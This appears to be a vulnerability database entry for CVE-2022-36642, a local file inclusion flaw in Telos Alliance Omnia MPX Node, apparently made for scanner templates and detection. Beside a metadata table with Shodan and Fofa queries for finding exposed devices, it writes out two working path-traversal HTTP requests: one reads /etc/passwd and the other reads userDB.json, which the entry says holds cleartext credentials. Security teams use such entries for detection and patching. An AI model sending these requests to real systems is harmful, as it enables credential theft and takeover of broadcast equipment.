| Title | Omnia MPX 1.5.0+r1 - Local File Inclusion |
|---|---|
| Author | arafatansari,ritikchaddha,For3stCo1d |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system. |
| Remediation | Apply the latest security patch or upgrade to a non-vulnerable version of Omnia MPX. |
| CVSS Score | 9.8 |
| EPSS Score | 0.71462 |
| CVE ID | CVE-2022-36642 |
| CWE ID | CWE-862 |
| Shodan Query | http.title:"Omnia MPX Node | Login"http.title:"omnia mpx node | login" |
| Fofa Query | title="omnia mpx node | login" |
| Tags | cve cve2022 traversal omnia edb lfi telosalliance vkev vuln |
Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel.
GET /logs/downloadMainLog?fname=../../../../../../..//etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-36642.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-36642.pcap
N/AN/A